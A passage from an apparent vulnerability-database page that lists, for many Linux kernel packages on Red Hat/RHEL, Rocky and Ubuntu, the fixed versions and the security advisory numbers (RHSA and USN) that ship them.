Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-tools-debuginfoRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-tools-libsRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-tools-libsRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-tools-libs-develRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-tools-libs-develRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-uki-virtRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-uki-virtRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-uki-virt-addonsRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-uki-virt-addonsRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdumpRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-zfcpdumpRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdump-coreRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdump-coreRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdump-debuginfoRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-zfcpdump-debuginfoRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-zfcpdump-develRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdump-develRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdump-devel-matchedRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-zfcpdump-devel-matchedRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdump-modulesRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-zfcpdump-modulesRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdump-modules-coreRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-zfcpdump-modules-coreRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-zfcpdump-modules-extraRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-zfcpdump-modules-extraRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
libperfRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
libperfRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
libperf-debuginfoRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
libperf-debuginfoRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
perfRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
perfRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
perf-debuginfoRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
perf-debuginfoRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
python3-perfRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
python3-perfRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
python3-perf-debuginfoRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
python3-perf-debuginfoRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
rtlaRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
rtlaRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
rvRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
rvRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
linuxUbuntu
Fixed in:6.8.0-54.56USN-7301-1
linux-awsUbuntu
Fixed in:6.8.0-1023.25USN-7311-1
linux-aws-6.8Ubuntu
Fixed in:6.8.0-1023.25~22.04.1USN-7311-1
linux-azureUbuntu
Fixed in:6.8.0-1025.30USN-7384-1
linux-azure-6.8Ubuntu
Fixed in:6.8.0-1025.30~22.04.1USN-7384-2
linux-azure-nvidiaUbuntu
Fixed in:6.8.0-1014.15USN-7468-1
linux-gcpUbuntu
Fixed in:6.8.0-1024.26USN-7304-1
linux-gcp-6.8Ubuntu
Fixed in:6.8.0-1024.26~22.04.1USN-7303-3
linux-gkeUbuntu
Fixed in:6.8.0-1019.23USN-7304-1
linux-gkeopUbuntu
Fixed in:6.8.0-1006.8USN-7304-1
linux-hwe-6.8Ubuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-ibmUbuntu
Fixed in:6.8.0-1022.22USN-7385-1
linux-image-6.11.0-1015-oemUbuntu
Fixed in:6.11.0-1015.15USN-7310-1
linux-image-6.8.0-1006-gkeopUbuntu
Fixed in:6.8.0-1006.8USN-7304-1
linux-image-6.8.0-1014-azure-nvidiaUbuntu
Fixed in:6.8.0-1014.15USN-7468-1
linux-image-6.8.0-1019-gkeUbuntu
Fixed in:6.8.0-1019.23USN-7304-1
linux-image-6.8.0-1019-raspiUbuntu
Fixed in:6.8.0-1019.23USN-7303-3
linux-image-6.8.0-1020-oracleUbuntu
Fixed in:6.8.0-1020.21~22.04.1USN-7303-2
Fixed in:6.8.0-1020.21USN-7303-2
linux-image-6.8.0-1020-oracle-64kUbuntu
Fixed in:6.8.0-1020.21~22.04.1USN-7303-2
Fixed in:6.8.0-1020.21USN-7303-2
linux-image-6.8.0-1022-ibmUbuntu
Fixed in:6.8.0-1022.22USN-7385-1
linux-image-6.8.0-1022-nvidiaUbuntu
Fixed in:6.8.0-1022.25~22.04.2USN-7303-1
Fixed in:6.8.0-1022.25USN-7303-1
linux-image-6.8.0-1022-nvidia-64kUbuntu
Fixed in:6.8.0-1022.25~22.04.2USN-7303-1
Fixed in:6.8.0-1022.25USN-7303-1
linux-image-6.8.0-1022-nvidia-lowlatencyUbuntu
Fixed in:6.8.0-1022.25.2USN-7303-1
linux-image-6.8.0-1022-nvidia-lowlatency-64kUbuntu
Fixed in:6.8.0-1022.25.2USN-7303-1
linux-image-6.8.0-1023-awsUbuntu
Fixed in:6.8.0-1023.25~22.04.1USN-7311-1
Fixed in:6.8.0-1023.25USN-7311-1
linux-image-6.8.0-1024-gcpUbuntu
Fixed in:6.8.0-1024.26~22.04.1USN-7303-3
Fixed in:6.8.0-1024.26USN-7304-1
linux-image-6.8.0-1024-gcp-64kUbuntu
Fixed in:6.8.0-1024.26~22.04.1USN-7303-3
Fixed in:6.8.0-1024.26USN-7304-1
linux-image-6.8.0-1024-oemUbuntu
Fixed in:6.8.0-1024.24USN-7386-1
linux-image-6.8.0-1025-azureUbuntu
Fixed in:6.8.0-1025.30~22.04.1USN-7384-2
Fixed in:6.8.0-1025.30USN-7384-1
linux-image-6.8.0-1025-azure-fdeUbuntu
Fixed in:6.8.0-1025.30~22.04.1USN-7384-2
Fixed in:6.8.0-1025.30USN-7384-1
linux-image-6.8.0-54-genericUbuntu
Fixed in:6.8.0-54.56USN-7301-1
linux-image-6.8.0-54-generic-64kUbuntu
Fixed in:6.8.0-54.56USN-7301-1
linux-image-6.8.0-54-lowlatencyUbuntu
Fixed in:6.8.0-54.56.1~22.04.1USN-7301-1
Fixed in:6.8.0-54.56.1USN-7301-1
linux-image-6.8.0-54-lowlatency-64kUbuntu
Fixed in:6.8.0-54.56.1~22.04.1USN-7301-1
Fixed in:6.8.0-54.56.1USN-7301-1
linux-image-6.8.0-57-genericUbuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-6.8.0-57-generic-64kUbuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-awsUbuntu
Fixed in:6.8.0-1023.25~22.04.1USN-7311-1
Fixed in:6.8.0-1023.25USN-7311-1
linux-image-aws-lts-24.04Ubuntu
Fixed in:6.8.0-1023.25USN-7311-1
linux-image-azureUbuntu
Fixed in:6.8.0-1025.30~22.04.1USN-7384-2
linux-image-azure-fdeUbuntu
Fixed in:6.8.0-1025.30~22.04.1USN-7384-2
linux-image-azure-fde-lts-24.04Ubuntu
Fixed in:6.8.0-1025.30USN-7384-1
linux-image-azure-lts-24.04Ubuntu
Fixed in:6.8.0-1025.30USN-7384-1
linux-image-azure-nvidiaUbuntu
Fixed in:6.8.0-1014.15USN-7468-1
linux-image-gcpUbuntu
Fixed in:6.8.0-1024.26~22.04.1USN-7303-3
Fixed in:6.8.0-1024.26USN-7304-1
linux-image-gcp-64kUbuntu
Fixed in:6.8.0-1024.26~22.04.1USN-7303-3
Fixed in:6.8.0-1024.26USN-7304-1
linux-image-gcp-64k-lts-24.04Ubuntu
Fixed in:6.8.0-1024.26USN-7304-1
linux-image-gcp-lts-24.04Ubuntu
Fixed in:6.8.0-1024.26USN-7304-1
linux-image-genericUbuntu
Fixed in:6.8.0-54.56USN-7301-1
linux-image-generic-64kUbuntu
Fixed in:6.8.0-54.56USN-7301-1
linux-image-generic-64k-hwe-22.04Ubuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-generic-hwe-22.04Ubuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-generic-lpaeUbuntu
Fixed in:6.8.0-54.56USN-7301-1
linux-image-gkeUbuntu
Fixed in:6.8.0-1019.23USN-7304-1
linux-image-gkeopUbuntu
Fixed in:6.8.0-1006.8USN-7304-1
linux-image-gkeop-6.8Ubuntu
Fixed in:6.8.0-1006.8USN-7304-1
linux-image-ibmUbuntu
Fixed in:6.8.0-1022.22USN-7385-1
linux-image-ibm-classicUbuntu
Fixed in:6.8.0-1022.22USN-7385-1
linux-image-ibm-lts-24.04Ubuntu
Fixed in:6.8.0-1022.22USN-7385-1
linux-image-kvmUbuntu
Fixed in:6.8.0-54.56USN-7301-1
linux-image-lowlatencyUbuntu
Fixed in:6.8.0-54.56.1USN-7301-1
linux-image-lowlatency-64kUbuntu
Fixed in:6.8.0-54.56.1USN-7301-1
linux-image-lowlatency-64k-hwe-22.04Ubuntu
Fixed in:6.8.0-54.56.1~22.04.1USN-7301-1
linux-image-lowlatency-hwe-22.04Ubuntu
Fixed in:6.8.0-54.56.1~22.04.1USN-7301-1
linux-image-nvidiaUbuntu
Fixed in:6.8.0-1022.25USN-7303-1
linux-image-nvidia-6.8Ubuntu
Fixed in:6.8.0-1022.25~22.04.2USN-7303-1
linux-image-nvidia-64kUbuntu
Fixed in:6.8.0-1022.25USN-7303-1
linux-image-nvidia-64k-6.8Ubuntu
Fixed in:6.8.0-1022.25~22.04.2USN-7303-1
linux-image-nvidia-64k-hwe-22.04Ubuntu
Fixed in:6.8.0-1022.25~22.04.2USN-7303-1
linux-image-nvidia-hwe-22.04Ubuntu
Fixed in:6.8.0-1022.25~22.04.2USN-7303-1
linux-image-nvidia-lowlatencyUbuntu
Fixed in:6.8.0-1022.25.2USN-7303-1
linux-image-nvidia-lowlatency-64kUbuntu
Fixed in:6.8.0-1022.25.2USN-7303-1
linux-image-oem-22.04Ubuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-oem-22.04aUbuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-oem-22.04bUbuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-oem-22.04cUbuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-oem-22.04dUbuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-image-oem-24.04Ubuntu
Fixed in:6.8.0-1024.24USN-7386-1
linux-image-oem-24.04aUbuntu
Fixed in:6.8.0-1024.24USN-7386-1
linux-image-oem-24.04bUbuntu
Fixed in:6.11.0-1015.15USN-7310-1
linux-image-oracleUbuntu
Fixed in:6.8.0-1020.21~22.04.1USN-7303-2
Fixed in:6.8.0-1020.21USN-7303-2
linux-image-oracle-64kUbuntu
Fixed in:6.8.0-1020.21~22.04.1USN-7303-2
Fixed in:6.8.0-1020.21USN-7303-2
linux-image-oracle-64k-lts-24.04Ubuntu
Fixed in:6.8.0-1020.21USN-7303-2
linux-image-oracle-lts-24.04Ubuntu
Fixed in:6.8.0-1020.21USN-7303-2
linux-image-raspiUbuntu
Fixed in:6.8.0-1019.23USN-7303-3
linux-image-virtualUbuntu
Fixed in:6.8.0-54.56USN-7301-1
linux-image-virtual-hwe-22.04Ubuntu
Fixed in:6.8.0-57.59~22.04.1USN-7403-1
linux-lowlatencyUbuntu
